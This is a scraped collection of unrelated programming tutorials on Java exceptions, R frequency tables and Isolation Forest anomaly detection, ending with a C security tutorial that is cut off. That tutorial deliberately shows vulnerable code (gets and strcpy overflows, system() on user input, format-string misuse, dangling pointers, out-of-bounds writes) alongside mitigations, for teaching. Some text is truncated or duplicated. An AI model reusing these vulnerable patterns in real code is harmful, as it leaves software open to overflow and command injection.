parameters (two integers)." }, { "code": null, "e": 2278, "s": 2081, "text": "class Test{\n public int division(int a, int b){\n int result = a/b;\n return result;\n }\n public double division (int a, int b){\n double result = a/b;\n return result;\n }\n}" }, { "code": null, "e": 2438, "s": 2278, "text": "If you try to compile the above program, since the parameters are not different Java compiler considers them as same methods and generates the following error." }, { "code": null, "e": 2607, "s": 2438, "text": "OverloadingExample.java:6: error: method division(int,int) is already defined in class Test\npublic static double division (int a, int b){\n ^\n1 error" } ]
How IllegalArgumentException automatically handled inside 'if' condition in java?
Whenever you pass inappropriate arguments to a method or constructor, an IllegalArgumentException is thrown. It is a Runtime exception therefore there is no need to handle this at the time of compilation. The valueOf() method of the java.sql.Date class accepts a String representing a date in JDBC escape format yyyy-[m]m-[d]d and converts it into a java.sql.Date object. import java.sql.Date; import java.util.Scanner; public class IllegalArgumentExample { public static void main(String args[]) { Scanner sc = new Scanner(System.in); System.out.println("Enter your date of birth in JDBC escape format (yyyy-mm-dd) "); String dateString = sc.next(); Date date = Date.valueOf(dateString); System.out.println("Given date converted int to an object: "+date); } } Enter your date of birth in JDBC escape format (yyyy-mm-dd) 1989-09-26 Given date converted into an object: 1989-09-26 But if you pass date String in any other format this method throws an IllegalArgumentException. import java.sql.Date; import java.util.Scanner; public class IllegalArgumentExample { public static void main(String args[]) { Scanner sc = new Scanner(System.in); System.out.println("Enter your date of birth in JDBC escape format (yyyy-mm-dd) "); String dateString = sc.next(); Date date = Date.valueOf(dateString); System.out.println("Given date converted int to an object: "+date); } } Enter your date of birth in JDBC escape format (yyyy-mm-dd) 26-07-1989 Exception in thread "main" java.lang.IllegalArgumentException at java.sql.Date.valueOf(Unknown Source) at july_ipoindi.NextElementExample.main(NextElementExample.java:11) In the following Java example the Date constructor (actually deprecated) accepts The setPriority() method of the Thread class accepts an integer value representing the priority of the thread and sets it to the current thread. But, the value passed to this method should be less than the maxpriority of the thread else, this method throws an IllegalArgumentException. public class IllegalArgumentExample { public static void main(String args[]) { Thread thread = new Thread(); System.out.println(thread.MAX_PRIORITY); thread.setPriority(12); } } 10Exception in thread "main" java.lang.IllegalArgumentException at java.lang.Thread.setPriority(Unknown Source) at july_ipoindi.NextElementExample.main(NextElementExample.java:6) While you use the methods that causes IllegalArgumentException, since you know the legal arguments of them, you can restrict/validate the arguments using if-condition before-hand and avoid the exception. import java.util.Scanner; public class IllegalArgumentExample { public static void main(String args[]) { Thread thread = new Thread(); System.out.println("Enter the thread priority value: "); Scanner sc = new Scanner(System.in); int priority = sc.nextInt(); if(priority<=Thread.MAX_PRIORITY) { thread.setPriority(priority); }else{ System.out.println("Priority value should be less than: "+Thread.MAX_PRIORITY); } } } Enter the thread priority value: 15 Priority value should be less than: 10
[ { "code": null, "e": 1267, "s": 1062, "text": "Whenever you pass inappropriate arguments to a method or constructor, an IllegalArgumentException is thrown. It is a Runtime exception therefore there is no need to handle this at the time of compilation." }, { "code": null, "e": 1434, "s": 1267, "text": "The valueOf() method of the java.sql.Date class accepts a String representing a date in JDBC escape format yyyy-[m]m-[d]d and converts it into a java.sql.Date object." }, { "code": null, "e": 1859, "s": 1434, "text": "import java.sql.Date;\nimport java.util.Scanner;\npublic class IllegalArgumentExample {\n public static void main(String args[]) {\n Scanner sc = new Scanner(System.in);\n System.out.println(\"Enter your date of birth in JDBC escape format (yyyy-mm-dd) \");\n String dateString = sc.next();\n Date date = Date.valueOf(dateString);\n System.out.println(\"Given date converted int to an object: \"+date);\n }\n}" }, { "code": null, "e": 1978, "s": 1859, "text": "Enter your date of birth in JDBC escape format (yyyy-mm-dd)\n1989-09-26\nGiven date converted into an object: 1989-09-26" }, { "code": null, "e": 2074, "s": 1978, "text": "But if you pass date String in any other format this method throws an IllegalArgumentException." }, { "code": null, "e": 2499, "s": 2074, "text": "import java.sql.Date;\nimport java.util.Scanner;\npublic class IllegalArgumentExample {\n public static void main(String args[]) {\n Scanner sc = new Scanner(System.in);\n System.out.println(\"Enter your date of birth in JDBC escape format (yyyy-mm-dd) \");\n String dateString = sc.next();\n Date date = Date.valueOf(dateString);\n System.out.println(\"Given date converted int to an object: \"+date);\n }\n}" }, { "code": null, "e": 2828, "s": 2499, "text": "Enter your date of birth in JDBC escape format (yyyy-mm-dd)\n26-07-1989\nException in thread \"main\" java.lang.IllegalArgumentException\n at java.sql.Date.valueOf(Unknown Source)\n at july_ipoindi.NextElementExample.main(NextElementExample.java:11)\nIn the following Java example the Date constructor (actually deprecated) accepts" }, { "code": null, "e": 3114, "s": 2828, "text": "The setPriority() method of the Thread class accepts an integer value representing the priority of the thread and sets it to the current thread. But, the value passed to this method should be less than the maxpriority of the thread else, this method throws an IllegalArgumentException." }, { "code": null, "e": 3316, "s": 3114, "text": "public class IllegalArgumentExample {\n public static void main(String args[]) {\n Thread thread = new Thread();\n System.out.println(thread.MAX_PRIORITY);\n thread.setPriority(12);\n }\n}" }, { "code": null, "e": 3501, "s": 3316, "text": "10Exception in thread \"main\"\njava.lang.IllegalArgumentException\n at java.lang.Thread.setPriority(Unknown Source)\n at july_ipoindi.NextElementExample.main(NextElementExample.java:6)" }, { "code": null, "e": 3705, "s": 3501, "text": "While you use the methods that causes IllegalArgumentException, since you know the legal arguments of them, you can restrict/validate the arguments using if-condition before-hand and avoid the exception." }, { "code": null, "e": 4188, "s": 3705, "text": "import java.util.Scanner;\npublic class IllegalArgumentExample {\n public static void main(String args[]) {\n Thread thread = new Thread();\n System.out.println(\"Enter the thread priority value: \");\n Scanner sc = new Scanner(System.in);\n int priority = sc.nextInt();\n if(priority<=Thread.MAX_PRIORITY) {\n thread.setPriority(priority);\n }else{\n System.out.println(\"Priority value should be less than: \"+Thread.MAX_PRIORITY);\n }\n }\n}" }, { "code": null, "e": 4263, "s": 4188, "text": "Enter the thread priority value:\n15\nPriority value should be less than: 10" } ]
How to count the number of occurrences of all unique values in an R data frame?
A data frame in R can have infinite number of unique values and it can also contain many repeated values. Therefore, finding the number of all unique values in the data frame can help us to understand the diversity in the data but this most done in situations where we expect to have repeated elements otherwise it would not make sense. To count the number of occurrences of all unique values, we can use table function along with the unlist as shown in the below examples. Consider the below data frame − Live Demo x1<-sample(LETTERS[1:5],20,replace=TRUE) x2<-sample(LETTERS[1:5],20,replace=TRUE) x3<-sample(LETTERS[1:5],20,replace=TRUE) x4<-sample(LETTERS[1:5],20,replace=TRUE) x5<-sample(LETTERS[1:5],20,replace=TRUE) df1<-data.frame(x1,x2,x3,x4,x5) df1 x1 x2 x3 x4 x5 1 B E D E E 2 E A C E E 3 C A D A D 4 C C A D C 5 D D A C B 6 C C E E B 7 B B C B A 8 A E B C B 9 E D E B E 10 C B A C A 11 C C C B D 12 A B C A A 13 C D D C C 14 E C E D C 15 A A B D E 16 E D E A E 17 C C A D E 18 C C E C D 19 B B A E B 20 D B D A B Finding the number of unique values in the data frame df1 − table(unlist(df1)) A B C D E 18 27 22 17 16 Let’s have a look at another example − Live Demo y1<-sample(0:2,20,replace=TRUE) y2<-sample(0:2,20,replace=TRUE) y3<-sample(0:2,20,replace=TRUE) y4<-sample(0:2,20,replace=TRUE) df2<-data.frame(y1,y2,y3,y4) df2 y1 y2 y3 y4 1 0 2 1 2 2 0 0 1 1 3 1 1 2 1 4 2 2 0 0 5 1 0 2 1 6 0 2 2 0 7 0 0 1 1 8 0 2 0 1 9 2 2 2 2 10 1 0 2 0 11 0 1 1 2 12 2 2 2 1 13 0 1 1 0 14 2 2 1 2 15 2 2 0 0 16 2 2 1 1 17 1 2 2 2 18 2 1 0 2 19 1 0 2 0 20 1 2 0 2 Finding the number of unique values in the data frame df2 − table(unlist(df2)) 0 1 2 32 26 22
[ { "code": null, "e": 1536, "s": 1062, "text": "A data frame in R can have infinite number of unique values and it can also contain many repeated values. Therefore, finding the number of all unique values in the data frame can help us to understand the diversity in the data but this most done in situations where we expect to have repeated elements otherwise it would not make sense. To count the number of occurrences of all unique values, we can use table function along with the unlist as shown in the below examples." }, { "code": null, "e": 1568, "s": 1536, "text": "Consider the below data frame −" }, { "code": null, "e": 1579, "s": 1568, "text": " Live Demo" }, { "code": null, "e": 1820, "s": 1579, "text": "x1<-sample(LETTERS[1:5],20,replace=TRUE)\nx2<-sample(LETTERS[1:5],20,replace=TRUE)\nx3<-sample(LETTERS[1:5],20,replace=TRUE)\nx4<-sample(LETTERS[1:5],20,replace=TRUE)\nx5<-sample(LETTERS[1:5],20,replace=TRUE)\ndf1<-data.frame(x1,x2,x3,x4,x5)\ndf1" }, { "code": null, "e": 2177, "s": 1820, "text": " x1 x2 x3 x4 x5\n1 B E D E E\n2 E A C E E\n3 C A D A D\n4 C C A D C\n5 D D A C B\n6 C C E E B\n7 B B C B A\n8 A E B C B\n9 E D E B E\n10 C B A C A\n11 C C C B D\n12 A B C A A\n13 C D D C C\n14 E C E D C\n15 A A B D E\n16 E D E A E\n17 C C A D E\n18 C C E C D\n19 B B A E B\n20 D B D A B" }, { "code": null, "e": 2237, "s": 2177, "text": "Finding the number of unique values in the data frame df1 −" }, { "code": null, "e": 2256, "s": 2237, "text": "table(unlist(df1))" }, { "code": null, "e": 2287, "s": 2256, "text": "A B C D E \n18 27 22 17 16" }, { "code": null, "e": 2326, "s": 2287, "text": "Let’s have a look at another example −" }, { "code": null, "e": 2337, "s": 2326, "text": " Live Demo" }, { "code": null, "e": 2498, "s": 2337, "text": "y1<-sample(0:2,20,replace=TRUE)\ny2<-sample(0:2,20,replace=TRUE)\ny3<-sample(0:2,20,replace=TRUE)\ny4<-sample(0:2,20,replace=TRUE)\ndf2<-data.frame(y1,y2,y3,y4)\ndf2" }, { "code": null, "e": 2792, "s": 2498, "text": " y1 y2 y3 y4\n1 0 2 1 2\n2 0 0 1 1\n3 1 1 2 1\n4 2 2 0 0\n5 1 0 2 1\n6 0 2 2 0\n7 0 0 1 1\n8 0 2 0 1\n9 2 2 2 2\n10 1 0 2 0\n11 0 1 1 2\n12 2 2 2 1\n13 0 1 1 0\n14 2 2 1 2\n15 2 2 0 0\n16 2 2 1 1\n17 1 2 2 2\n18 2 1 0 2\n19 1 0 2 0\n20 1 2 0 2" }, { "code": null, "e": 2852, "s": 2792, "text": "Finding the number of unique values in the data frame df2 −" }, { "code": null, "e": 2871, "s": 2852, "text": "table(unlist(df2))" }, { "code": null, "e": 2889, "s": 2871, "text": " 0 1 2\n32 26 22" } ]
“Isolation Forest”: The Anomaly Detection Algorithm Any Data Scientist Should Know | by Samuele Mazzanti | Towards Data Science
“Isolation Forest” is a brilliant algorithm for anomaly detection born in 2009 (here is the original paper). It has since become very popular: it is also implemented in Scikit-learn (see the documentation). In this article, we will appreciate the beauty in the intuition behind this algorithm and understand how exactly it works under the hood, with the aid of some examples. Anomaly (or outlier) detection is the task of identifying data points that are “very strange” compared to the majority of observations. This is useful in a range of applications, from fault detection to discovery of financial frauds, from finding health issues to identifying unsatisfied customers. Moreover, it can also be beneficial for machine learning pipelines, since it has been proven that removing outliers leads to an increase in model accuracy. What makes anomaly detection so hard is that it is an unsupervised problem. In other words, we usually don’t have labels telling us which instances are actually “anomalies”. Or rather, even if we had labels, it would be very hard to frame anomaly detection as a supervised problem. In fact: anomalies are rare; anomalies are novel; anomalies are different from each other. For all these reasons, supervised techniques typically make a bad fit with anomaly detection. The traditional approach to anomaly detection was roughly: Describe how “normal instances” look like (this usually involves cluster analysis).Label all instances that don’t fit into those profiles as outliers. Describe how “normal instances” look like (this usually involves cluster analysis). Label all instances that don’t fit into those profiles as outliers. The innovation introduced by Isolation Forest is that it starts directly from outliers rather than from normal observations. The core idea is that it should be very easy to “isolate” anomalies based on the caracteristics that make them unique. Technically, this translates into the fact that, if we fit a decision tree on all the observations, outliers should be found closer to the root of the tree than “normal” instances. What does it mean? Let’s make this clear with an example. Suppose that we have a dataset containing data about all the 7,932,843,214 humans alive right now. We have as many variables as we want: age, net worth, place of residence, job title... What are the outliers in such a dataset? Keep in mind that outliers are not necessarily wrong data: they are just data points that are very different from the rest of the population. In this example, Jeff Bezos is for sure an outlier. Now imagine that we could fit a decision tree such that each terminal leaf contains one and only one person. In other words, this tree is completely unpruned. If the assumption behind Isolation Forest is correct, then Jeff Bezos will be found closer to the tree root than, say, myself. Being an outlier, Jeff Bezos is easier to isolate: it’s enough to ask “is he worth more than 170 billion $?” to retrieve him among almost 8 billion humans. On the other hand, since I am by far more ordinary than Jeff Bezos, you would probably need at least 10 True/False question to narrow down the search space until you find me. Now that we have seen the main intuition behind Isolation Forest, let’s try to understand the exact mechanics of the algorithm, with the aid of some simple data points. import pandas as pddf = pd.DataFrame({ 'x': [1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 2.0], 'y': [2.1, 2.4, 3.0, 2.6, 2.2, 2.8, 3.7]}, index = ['A', 'B', 'C', 'D', 'E', 'F', 'G']) Items from A to F represent a quite compact cloud of points: they are “normal” data points. Compared to these instances, G is probably an outlier: it has anomalous values both for x and y. Isolation Forest is based on trees, so let’s fit a tree on these data: Note that this tree has been grown in a random fashion. The most fundamental concept here is the depth of the leaf at which each element is found. For example, in this tree, the observation called G (our outlier) is at depth 1 (e.g. 1 level from the root node), whereas C is at depth 3. The idea behind Isolation Forest is that, on average, outliers will be closer to the root node (i.e. at a lower depth) than normal instances. As often in machine learning, the key is iteration. In fact, if we randomly fit many decision trees, and then take an average of the depth of each observation over the different trees, we find an “average depth” that represents an empirical measure of “outlierness”. Let’s see an example of usage through the Scikit-learn’s implementation. from sklearn.ensemble import IsolationForestiforest = IsolationForest(n_estimators = 100).fit(df) If we take the first 9 trees from the forest (iforest.estimators_[:9]) and plot them, this is what we get: Taking a look at these first 9 trees, we can already see a pattern: G tends to be at a much lower depth (1.44 on average) than any other point. Indeed, the second point is A with an average depth of 2.78. Conceptually, this is exactly how the algorithm works: a lower average depth means a higher likelihood of being an outlier. However, in practice, we cannot use average depth, since the depth of a tree depends on the number of samples it has been fit on. For this reason, we need a formula that also take into account the total number of instances. This is the formula proposed in the paper: where n is the number of instances, h(x) is the depth at which the data point is found in a particular tree (E(h(x)) is its average over different trees), and H is the armonic number. s(x, n) is a number between 0 and 1, where the higher the score the more likely it is an outlier. Note: Scikit-learn’s implementation returns the opposite of the score defined above. So what said above is still valid, but with negative sign. On our small dataset, the scores are given by: scores = iforest.score_samples(df) Let’s see the scores estimated for each of our points: As we expected, G is more likely to be an outlier, since its score is lower than all the other scores. Besides our toy dataset, it’s interesting to simulate what the algorithm would yield in some particular cases. For instance, if we take some data points that roughly form a circle shape on two variables (x and y), this is the contour plot of the scores that we would obtain through Isolation Forest: Interestingly enough, not only the most extremes zones are likely to be outliers, but also the part at the center of the circle, since it is an unusual combination of x and y. Thank you for reading! I hope you found this post useful. I appreciate feedback and constructive criticism. If you want to talk about this article or other related topics, you can text me at my Linkedin contact.
[ { "code": null, "e": 378, "s": 171, "text": "“Isolation Forest” is a brilliant algorithm for anomaly detection born in 2009 (here is the original paper). It has since become very popular: it is also implemented in Scikit-learn (see the documentation)." }, { "code": null, "e": 547, "s": 378, "text": "In this article, we will appreciate the beauty in the intuition behind this algorithm and understand how exactly it works under the hood, with the aid of some examples." }, { "code": null, "e": 683, "s": 547, "text": "Anomaly (or outlier) detection is the task of identifying data points that are “very strange” compared to the majority of observations." }, { "code": null, "e": 1002, "s": 683, "text": "This is useful in a range of applications, from fault detection to discovery of financial frauds, from finding health issues to identifying unsatisfied customers. Moreover, it can also be beneficial for machine learning pipelines, since it has been proven that removing outliers leads to an increase in model accuracy." }, { "code": null, "e": 1293, "s": 1002, "text": "What makes anomaly detection so hard is that it is an unsupervised problem. In other words, we usually don’t have labels telling us which instances are actually “anomalies”. Or rather, even if we had labels, it would be very hard to frame anomaly detection as a supervised problem. In fact:" }, { "code": null, "e": 1313, "s": 1293, "text": "anomalies are rare;" }, { "code": null, "e": 1334, "s": 1313, "text": "anomalies are novel;" }, { "code": null, "e": 1375, "s": 1334, "text": "anomalies are different from each other." }, { "code": null, "e": 1469, "s": 1375, "text": "For all these reasons, supervised techniques typically make a bad fit with anomaly detection." }, { "code": null, "e": 1528, "s": 1469, "text": "The traditional approach to anomaly detection was roughly:" }, { "code": null, "e": 1679, "s": 1528, "text": "Describe how “normal instances” look like (this usually involves cluster analysis).Label all instances that don’t fit into those profiles as outliers." }, { "code": null, "e": 1763, "s": 1679, "text": "Describe how “normal instances” look like (this usually involves cluster analysis)." }, { "code": null, "e": 1831, "s": 1763, "text": "Label all instances that don’t fit into those profiles as outliers." }, { "code": null, "e": 1956, "s": 1831, "text": "The innovation introduced by Isolation Forest is that it starts directly from outliers rather than from normal observations." }, { "code": null, "e": 2075, "s": 1956, "text": "The core idea is that it should be very easy to “isolate” anomalies based on the caracteristics that make them unique." }, { "code": null, "e": 2256, "s": 2075, "text": "Technically, this translates into the fact that, if we fit a decision tree on all the observations, outliers should be found closer to the root of the tree than “normal” instances." }, { "code": null, "e": 2314, "s": 2256, "text": "What does it mean? Let’s make this clear with an example." }, { "code": null, "e": 2500, "s": 2314, "text": "Suppose that we have a dataset containing data about all the 7,932,843,214 humans alive right now. We have as many variables as we want: age, net worth, place of residence, job title..." }, { "code": null, "e": 2735, "s": 2500, "text": "What are the outliers in such a dataset? Keep in mind that outliers are not necessarily wrong data: they are just data points that are very different from the rest of the population. In this example, Jeff Bezos is for sure an outlier." }, { "code": null, "e": 3021, "s": 2735, "text": "Now imagine that we could fit a decision tree such that each terminal leaf contains one and only one person. In other words, this tree is completely unpruned. If the assumption behind Isolation Forest is correct, then Jeff Bezos will be found closer to the tree root than, say, myself." }, { "code": null, "e": 3352, "s": 3021, "text": "Being an outlier, Jeff Bezos is easier to isolate: it’s enough to ask “is he worth more than 170 billion $?” to retrieve him among almost 8 billion humans. On the other hand, since I am by far more ordinary than Jeff Bezos, you would probably need at least 10 True/False question to narrow down the search space until you find me." }, { "code": null, "e": 3521, "s": 3352, "text": "Now that we have seen the main intuition behind Isolation Forest, let’s try to understand the exact mechanics of the algorithm, with the aid of some simple data points." }, { "code": null, "e": 3696, "s": 3521, "text": "import pandas as pddf = pd.DataFrame({ 'x': [1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 2.0], 'y': [2.1, 2.4, 3.0, 2.6, 2.2, 2.8, 3.7]}, index = ['A', 'B', 'C', 'D', 'E', 'F', 'G'])" }, { "code": null, "e": 3885, "s": 3696, "text": "Items from A to F represent a quite compact cloud of points: they are “normal” data points. Compared to these instances, G is probably an outlier: it has anomalous values both for x and y." }, { "code": null, "e": 3956, "s": 3885, "text": "Isolation Forest is based on trees, so let’s fit a tree on these data:" }, { "code": null, "e": 4012, "s": 3956, "text": "Note that this tree has been grown in a random fashion." }, { "code": null, "e": 4243, "s": 4012, "text": "The most fundamental concept here is the depth of the leaf at which each element is found. For example, in this tree, the observation called G (our outlier) is at depth 1 (e.g. 1 level from the root node), whereas C is at depth 3." }, { "code": null, "e": 4385, "s": 4243, "text": "The idea behind Isolation Forest is that, on average, outliers will be closer to the root node (i.e. at a lower depth) than normal instances." }, { "code": null, "e": 4652, "s": 4385, "text": "As often in machine learning, the key is iteration. In fact, if we randomly fit many decision trees, and then take an average of the depth of each observation over the different trees, we find an “average depth” that represents an empirical measure of “outlierness”." }, { "code": null, "e": 4725, "s": 4652, "text": "Let’s see an example of usage through the Scikit-learn’s implementation." }, { "code": null, "e": 4823, "s": 4725, "text": "from sklearn.ensemble import IsolationForestiforest = IsolationForest(n_estimators = 100).fit(df)" }, { "code": null, "e": 4930, "s": 4823, "text": "If we take the first 9 trees from the forest (iforest.estimators_[:9]) and plot them, this is what we get:" }, { "code": null, "e": 5135, "s": 4930, "text": "Taking a look at these first 9 trees, we can already see a pattern: G tends to be at a much lower depth (1.44 on average) than any other point. Indeed, the second point is A with an average depth of 2.78." }, { "code": null, "e": 5259, "s": 5135, "text": "Conceptually, this is exactly how the algorithm works: a lower average depth means a higher likelihood of being an outlier." }, { "code": null, "e": 5526, "s": 5259, "text": "However, in practice, we cannot use average depth, since the depth of a tree depends on the number of samples it has been fit on. For this reason, we need a formula that also take into account the total number of instances. This is the formula proposed in the paper:" }, { "code": null, "e": 5710, "s": 5526, "text": "where n is the number of instances, h(x) is the depth at which the data point is found in a particular tree (E(h(x)) is its average over different trees), and H is the armonic number." }, { "code": null, "e": 5808, "s": 5710, "text": "s(x, n) is a number between 0 and 1, where the higher the score the more likely it is an outlier." }, { "code": null, "e": 5952, "s": 5808, "text": "Note: Scikit-learn’s implementation returns the opposite of the score defined above. So what said above is still valid, but with negative sign." }, { "code": null, "e": 5999, "s": 5952, "text": "On our small dataset, the scores are given by:" }, { "code": null, "e": 6034, "s": 5999, "text": "scores = iforest.score_samples(df)" }, { "code": null, "e": 6089, "s": 6034, "text": "Let’s see the scores estimated for each of our points:" }, { "code": null, "e": 6192, "s": 6089, "text": "As we expected, G is more likely to be an outlier, since its score is lower than all the other scores." }, { "code": null, "e": 6492, "s": 6192, "text": "Besides our toy dataset, it’s interesting to simulate what the algorithm would yield in some particular cases. For instance, if we take some data points that roughly form a circle shape on two variables (x and y), this is the contour plot of the scores that we would obtain through Isolation Forest:" }, { "code": null, "e": 6668, "s": 6492, "text": "Interestingly enough, not only the most extremes zones are likely to be outliers, but also the part at the center of the circle, since it is an unusual combination of x and y." }, { "code": null, "e": 6726, "s": 6668, "text": "Thank you for reading! I hope you found this post useful." } ]
Security issues in C language - GeeksforGeeks
01 Dec, 2021 C is a very powerful and popular programming language. It was first developed in the 1970s. C language is used in programming Network drivers, Interpreters, and Compilers, etc.Even though the C language is widely used in different systems still it has many security flaws associated with it. This article focuses on discussing security vulnerabilities in the C language. Mainly these security issues are related to vulnerable library functions, No bound checking for array and Pointers. Vulnerable Library Functions:CWE Codes: CWE – 242 , CWE – 120, CWE-77 1. Buffer And Memory Related: a. gets(): This function is a part of the standard input-output library of the C language. It does not have any check for buffer size and malicious input can easily cause a buffer overflow.Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ char buf[24]; printf("Please enter your name and press <Enter>\n"); gets(buf); printf("%s", buf); return 0;} Warning: prog.c: In function ‘main’: prog.c:10:1: warning: implicit declaration of function ‘gets’ [-Wimplicit-function-declaration] gets(buf); ^ /tmp/ccmwzcCQ.o: In function `main’: 69c380139e12adbab30e0550af51f5a9.c:(.text+0x2e): warning: the `gets’ function is dangerous and should not be used. Output: Input: GeeksforGeeksOutput: Please enter your name and press GeeksforGeeks Explanation:In the above code, the attacker can give large chunk of data as input, and the gets() function will try to store all that data into the buffer without considering the buffer size which will eventually cause a buffer overflow situation that can further cause arbitrary code execution, information leak. Mitigation:To solve this issue with the gets() function. Programmers can use fgets() function. It limits the input length based on the buffer size.Below is the C program to implement the above approach- C // C program to implement// the above approach#include <stdio.h>#define MAX 15 // Driver codeint main(){ char buf[MAX]; fgets(buf, MAX, stdin); printf("%s", buf); return 0;} Output: Input: GeeksforGeeksOutput: GeeksforGeeks Explanation:In the above code, fgets() function is taking buffer size ‘MAX’ as an argument and it will only write data that can be safely stored into the buffer of that size without overflowing it. b. strcpy(): This built-in function also doesn’t check for the buffer length and can overwrite memory locations based on the malicious input.If the buffer size of dest string is more then src string, then copy the src string to dest string with terminating NULL character. But if dest buffer is less, then src then it will copy the content without terminating NULL character. The strings may not overlap, and the destination string must be large enough to receive the copy.Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>#include <string.h> // Driver codeint main(){ char str1[2]; char str2[] = "GeeksforGeeks"; strcpy(str1, str2); printf("Copied string is: %s\n", str1); return 0;} Output: Input: GeeksforGeeksOutput: Copied string is: GeeksforGeeks Explanation:In the above code, strcpy() function is trying to copy the string available on str2[] to str1[] which does not have enough space in a buffer allocated to handle that which will eventually result in a buffer overflow in the application. Mitigation:Use of strncpy() function instead of strcpy(). strncpy() limits the length of input based on the buffer size available.Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>#include <string.h>#define BUFFER_SIZE 24 // Driver codeint main(){ // 24 is the buffer size char str1[BUFFER_SIZE]; char str2[] = "GeeksforGeeks"; // Limits number of characters // to be copied strncpy(str1, str2, BUFFER_SIZE); printf("Copied string is: %s\n", str1); return 0;} Output: Input: GeeksforGeeksOutput: Copied string is: GeeksforGeeks Explanation:In the above code, strncpy() function is taking BUFFER_SIZE as an argument and it will only write data that can be safely stored into the str1[ ] without overflowing the buffer. Using strcpy() function to copy a large character array into a smaller one is dangerous, but if the string will fit, then it will not be worth the risk. If the destination string is not large enough to store the source string then the behavior of strcpy() is unspecified or undefined. Note:Other library functions with same type of vulnerability- calloc, malloc, realloc, strcat, memcpy. 2. Command execution Vulnerabilities:If the attacker can control the command text or arguments to an external function call, then he can run arbitrary codes very easily.Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>#include <stdlib.h>#include <unistd.h> // Driver codeint main(){ char str[40]; fgets(str, 39, stdin); system(str); printf("%s", str);} Runtime Errors: sh: 1: GeeksforGeeks: not found Output: Input: GeeksforGeeksOutput: GeeksforGeeks Explanation:In the above code, if the str is controlled by the attacker then he can execute any command to the system and can put the entire system at risk. Observed CVEs are CVE-1999-0067, CVE-2019-12921. Mitigation: Ensure that all external commands called from the program are statically created. Use library calls rather than external processes to recreate the desired functionality. Note:Other library functions with the same type of vulnerability: execl, execle, popen. 3. Format String Vulnerabilities:Format specifiers like %d, %s if used in an improper way within the code than it may give the edge to the attacker for gaining access for arbitrary code execution, information leak and can also completely control the application. If successful, it returns the total number of characters written excluding null-character appended in the string, in case of failure a negative number is returned. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ char str[5]; sprintf(str, "%s", "GGGGGGGGGGGGGG"); printf("%s", str);} Runtime Error: Abort signal from abort(3) (SIGABRT) Explanation:In this above code, the sprintf function with format specifier %s may cause a buffer overflow because the output size is 15 which is greater than the size of buffer received that is of size 5 only. Besides this, the str[ ] can also be controlled by a external agent and cause all the above mentioned vulnerabilities (CWE – 13 ). Observed CVEs are CVE-2001-0717, CVE-2002-1788, CVE-2006-2480 etc. Mitigation: Choose a language not have such flaws. Ensure that all format string functions are passed a static string that cannot be controlled by the user. Use functions that do not support the %n operator in format strings. Note:Other library functions with the same type of vulnerability: fprintf, printf, sprintf, snprintf. Concept of Pointer:The pointer concept causes multiple security issues with the C programming language. 1. NULL Pointer Dereference: CWE CODE: CWE-476. If a program dereference a pointer that is expected to be valid but turns out as NULL then it causes program crash, exit. Mitigation to this is to do a check for the NULL pointer before performing any operation. Observed CVEs are CVE-2005-3274, CVE-2005-1912, CVE-2004-0079 etc.Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ int val = 1; int* p = NULL; *p = val; printf("%d", *p); return 0;} Runtime Error: Segmentation Fault (SIGSEGV) Explanation:In this code, *p is a NULL pointer which means it does not point to a memory location and trying to dereference it results in unexpected behavior in the program or segmentation fault. Mitigation:Below is the C program to demonstrate the mitigation stratergy for the above problem- C // C program to implement// the above concept#include <stdio.h> // Driver codeint main(){ int val = 1; int* p = NULL; if (p == NULL) { printf("Pointer is NULL"); } else { *p = val; printf("%d", *p); } return 0;} Output: Pointer is NULL Explanation:In this code, the first check is performed for a NULL pointer, before doing any operation on a pointer. Here is the if statement checks for the NULL condition and if it is found to be true then no further operation is getting executed. 2. Use after Free(Commonly referred to as Dangling pointer): CWE CODE: CWE-416. If a referencing memory is freed and then there is any attempt made to free that again, then it cause this situation. It can cause a program crash, information leak, and data corruption. Observed CVEs are CVE-2010-4168, CVE-2010-2941, CVE-2010-2547 etc.Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>int* fun(){ int y = 10; return &y;} // Driver codeint main(){ int* p = fun(); printf("%d", *p); return 0;} Output: Segmentation Fault (SIGSEGV) Explanation:In the above code, the main() function the *p contains the return value of the fun(). With the call of fun() the control moves to the context of the int *fun(), the fun() returns the address of the ‘y’ variable but in the context of main() ‘y’ is no longer available after the program flow returned. Therefore, it can be said that the *p is a dangling pointer as it points to the de-allocated memory. Mitigation:After freeing pointers set them to NULL. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>#include <stdlib.h> // Driver codeint main(){ int n = 5; int* ptr; ptr = (int*)malloc(n * sizeof(int)); // Memory has been successfully allocated printf("Memory successfully allocated using malloc.\n"); // Free the memory free(ptr); printf("Malloc Memory successfully freed.\n"); // freed pointer set to NULL value ptr = NULL; return 0;} Output: Memory successfully allocated using malloc. Malloc Memory successfully freed. Explanation:In this above code, after free(ptr) operation the ptr pointer value is set to NULL and it will mitigate the chances of a dangling pointer. No bound Checking for Array: 1. Out of Bounds Write: CWE CODE: CWE-787 In this, the software writes the data before or after the intended buffer. It may cause execution of unauthorized codes, Crash and restart. Observed CVEs are CVE-2020-0022, CVE-2009-0269, CVE-2009-1532 etc.Below is the C program to demonstrate the above concept- C // Program to demonstrate// accessing array out of bounds#include <stdio.h>int main(){ int arr[] = { 1, 2, 3, 4, 5 }; printf("arr [0] is %d\n", arr[0]); printf("arr[10] is %d\n", arr[10]); // allocation memory to out of bound // element arr[10] = 11; printf("arr[10] is %d\n", arr[10]); return 0;} Runtime Error: Segmentation Fault (SIGSEGV) Explanation:In this above code, array has valid indexes 0, 1, 2, 3, and 4 but there is an attempt to write the value on the arr[10]. As the C compiler will not check for the array bound it will write that data after the intended buffer. But when there is an attempt to print the value at index 10, it will show an error. Mitigation: Always make sure the buffer is large enough. Functions used to accept input should have a buffer limit implementation. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>int arr[5]; // Driver codeint main(){ int size = sizeof(arr) / sizeof(arr[0]); for (int i = 0; i < size; i++) { scanf("%d", &arr[i]); } // Print elements of array for (int i = 